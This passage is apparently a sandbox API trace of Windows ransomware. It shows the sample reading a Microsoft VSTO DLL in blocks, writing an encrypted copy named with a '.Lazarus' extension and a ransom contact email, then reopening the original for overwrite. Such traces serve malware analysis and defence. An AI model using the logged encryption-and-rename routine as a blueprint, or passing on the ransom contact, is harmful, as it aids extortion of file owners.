[0104.283] CloseHandle (hObject=0x27c) returned 1 [0104.283] AreFileApisANSI () returned 1 [0104.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0104.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5fb08 [0104.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x5fb08, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 81 [0104.283] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.283] GetFileType (hFile=0x27c) returned 0x1 [0104.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0104.284] CloseHandle (hObject=0x27c) returned 1 [0104.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0104.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0104.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0104.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0104.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0104.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0104.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0104.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0104.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0104.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0104.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0104.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0104.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0104.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0104.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0104.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0104.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0104.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0104.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0104.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0104.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0104.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0104.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0104.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0104.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0104.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0104.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0104.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0104.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0104.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0104.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0104.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0104.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0104.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0104.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0104.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0104.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0104.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0104.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0104.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0104.285] AreFileApisANSI () returned 1 [0104.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0104.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f428 [0104.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x5f428, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 81 [0104.285] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4a6fdac8, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0xbee8)) returned 1 [0104.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0104.285] AreFileApisANSI () returned 1 [0104.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0104.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0104.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0104.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0104.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0104.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0104.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0104.286] GetLastError () returned 0x0 [0104.286] SetLastError (dwErrCode=0x0) [0104.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e0a0 [0104.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x986d0 [0104.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c288 [0104.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0104.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0104.286] GetLastError () returned 0x0 [0104.286] SetLastError (dwErrCode=0x0) [0104.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0104.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0104.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8a530 [0104.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0104.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0104.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0104.286] AreFileApisANSI () returned 1 [0104.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a530, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 143 [0104.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x11e) returned 0x5e870 [0104.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a530, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=143 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 143 [0104.286] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.287] GetFileType (hFile=0x27c) returned 0x1 [0104.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0104.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0104.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0104.287] AreFileApisANSI () returned 1 [0104.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0104.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f798 [0104.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 81 [0104.287] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0104.288] GetFileType (hFile=0x368) returned 0x1 [0104.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0104.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0104.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0104.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0104.288] GetLastError () returned 0x0 [0104.288] SetLastError (dwErrCode=0x0) [0104.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0104.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0104.288] GetLastError () returned 0x0 [0104.288] SetLastError (dwErrCode=0x0) [0104.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0104.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0104.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x944a8 [0104.288] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0104.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0104.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0104.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x998e8 [0104.290] GetLastError () returned 0x0 [0104.290] SetLastError (dwErrCode=0x0) [0104.290] GetLastError () returned 0x0 [0104.291] SetLastError (dwErrCode=0x0) [0104.291] GetLastError () returned 0x0 [0104.291] SetLastError (dwErrCode=0x0) [0104.291] GetLastError () returned 0x0 [0104.291] SetLastError (dwErrCode=0x0) [0104.291] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.291] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.292] GetLastError () returned 0x0 [0104.292] SetLastError (dwErrCode=0x0) [0104.292] GetLastError () returned 0x0 [0104.293] SetLastError (dwErrCode=0x0) [0104.293] GetLastError () returned 0x0 [0104.293] SetLastError (dwErrCode=0x0) [0104.293] GetLastError () returned 0x0 [0104.293] SetLastError (dwErrCode=0x0) [0104.293] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.293] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.293] GetLastError () returned 0x0 [0104.293] SetLastError (dwErrCode=0x0) [0104.293] GetLastError () returned 0x0 [0104.293] SetLastError (dwErrCode=0x0) [0104.294] GetLastError () returned 0x0 [0104.294] SetLastError (dwErrCode=0x0) [0104.294] GetLastError () returned 0x0 [0104.294] SetLastError (dwErrCode=0x0) [0104.294] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.294] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.294] GetLastError () returned 0x0 [0104.294] SetLastError (dwErrCode=0x0) [0104.294] GetLastError () returned 0x0 [0104.294] SetLastError (dwErrCode=0x0) [0104.295] GetLastError () returned 0x0 [0104.295] SetLastError (dwErrCode=0x0) [0104.295] GetLastError () returned 0x0 [0104.295] SetLastError (dwErrCode=0x0) [0104.295] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.295] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.295] GetLastError () returned 0x0 [0104.295] SetLastError (dwErrCode=0x0) [0104.295] GetLastError () returned 0x0 [0104.295] SetLastError (dwErrCode=0x0) [0104.295] GetLastError () returned 0x0 [0104.295] SetLastError (dwErrCode=0x0) [0104.296] GetLastError () returned 0x0 [0104.296] SetLastError (dwErrCode=0x0) [0104.296] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.296] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.296] GetLastError () returned 0x0 [0104.296] SetLastError (dwErrCode=0x0) [0104.296] GetLastError () returned 0x0 [0104.296] SetLastError (dwErrCode=0x0) [0104.296] GetLastError () returned 0x0 [0104.296] SetLastError (dwErrCode=0x0) [0104.297] GetLastError () returned 0x0 [0104.297] SetLastError (dwErrCode=0x0) [0104.297] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.297] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.297] GetLastError () returned 0x0 [0104.297] SetLastError (dwErrCode=0x0) [0104.297] GetLastError () returned 0x0 [0104.297] SetLastError (dwErrCode=0x0) [0104.297] GetLastError () returned 0x0 [0104.297] SetLastError (dwErrCode=0x0) [0104.297] GetLastError () returned 0x0 [0104.297] SetLastError (dwErrCode=0x0) [0104.298] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.298] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.298] GetLastError () returned 0x0 [0104.298] SetLastError (dwErrCode=0x0) [0104.298] GetLastError () returned 0x0 [0104.298] SetLastError (dwErrCode=0x0) [0104.298] GetLastError () returned 0x0 [0104.298] SetLastError (dwErrCode=0x0) [0104.298] GetLastError () returned 0x0 [0104.299] SetLastError (dwErrCode=0x0) [0104.299] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.299] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.299] GetLastError () returned 0x0 [0104.299] SetLastError (dwErrCode=0x0) [0104.299] GetLastError () returned 0x0 [0104.299] SetLastError (dwErrCode=0x0) [0104.299] GetLastError () returned 0x0 [0104.299] SetLastError (dwErrCode=0x0) [0104.299] GetLastError () returned 0x0 [0104.299] SetLastError (dwErrCode=0x0) [0104.300] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.300] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.300] GetLastError () returned 0x0 [0104.300] SetLastError (dwErrCode=0x0) [0104.300] GetLastError () returned 0x0 [0104.300] SetLastError (dwErrCode=0x0) [0104.300] GetLastError () returned 0x0 [0104.300] SetLastError (dwErrCode=0x0) [0104.300] GetLastError () returned 0x0 [0104.300] SetLastError (dwErrCode=0x0) [0104.301] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.301] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.301] GetLastError () returned 0x0 [0104.301] SetLastError (dwErrCode=0x0) [0104.301] GetLastError () returned 0x0 [0104.301] SetLastError (dwErrCode=0x0) [0104.301] GetLastError () returned 0x0 [0104.301] SetLastError (dwErrCode=0x0) [0104.301] GetLastError () returned 0x0 [0104.301] SetLastError (dwErrCode=0x0) [0104.301] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0xee8, lpOverlapped=0x0) returned 1 [0104.302] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.302] GetLastError () returned 0x0 [0104.302] SetLastError (dwErrCode=0x0) [0104.302] GetLastError () returned 0x0 [0104.302] SetLastError (dwErrCode=0x0) [0104.302] GetLastError () returned 0x0 [0104.302] SetLastError (dwErrCode=0x0) [0104.302] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0104.302] GetLastError () returned 0x0 [0104.302] SetLastError (dwErrCode=0x0) [0104.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0104.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0104.303] GetLastError () returned 0x0 [0104.303] SetLastError (dwErrCode=0x0) [0104.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0104.303] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0xef0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327ef70*=0xef0, lpOverlapped=0x0) returned 1 [0104.303] GetLastError () returned 0x0 [0104.303] SetLastError (dwErrCode=0x0) [0104.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0104.303] GetLastError () returned 0x0 [0104.303] SetLastError (dwErrCode=0x0) [0104.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0104.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0104.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0104.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0104.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0104.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x998e8 | out: hHeap=0x20000) returned 1 [0104.303] CloseHandle (hObject=0x27c) returned 1 [0104.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x944a8 | out: hHeap=0x20000) returned 1 [0104.304] CloseHandle (hObject=0x368) returned 1 [0104.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0104.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0104.304] AreFileApisANSI () returned 1 [0104.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0104.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f2c8 [0104.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x5f2c8, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 81 [0104.304] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0104.305] GetFileType (hFile=0x368) returned 0x1 [0104.306] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0104.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x944a8 [0104.306] GetLastError () returned 0xb7 [0104.306] SetLastError (dwErrCode=0xb7) 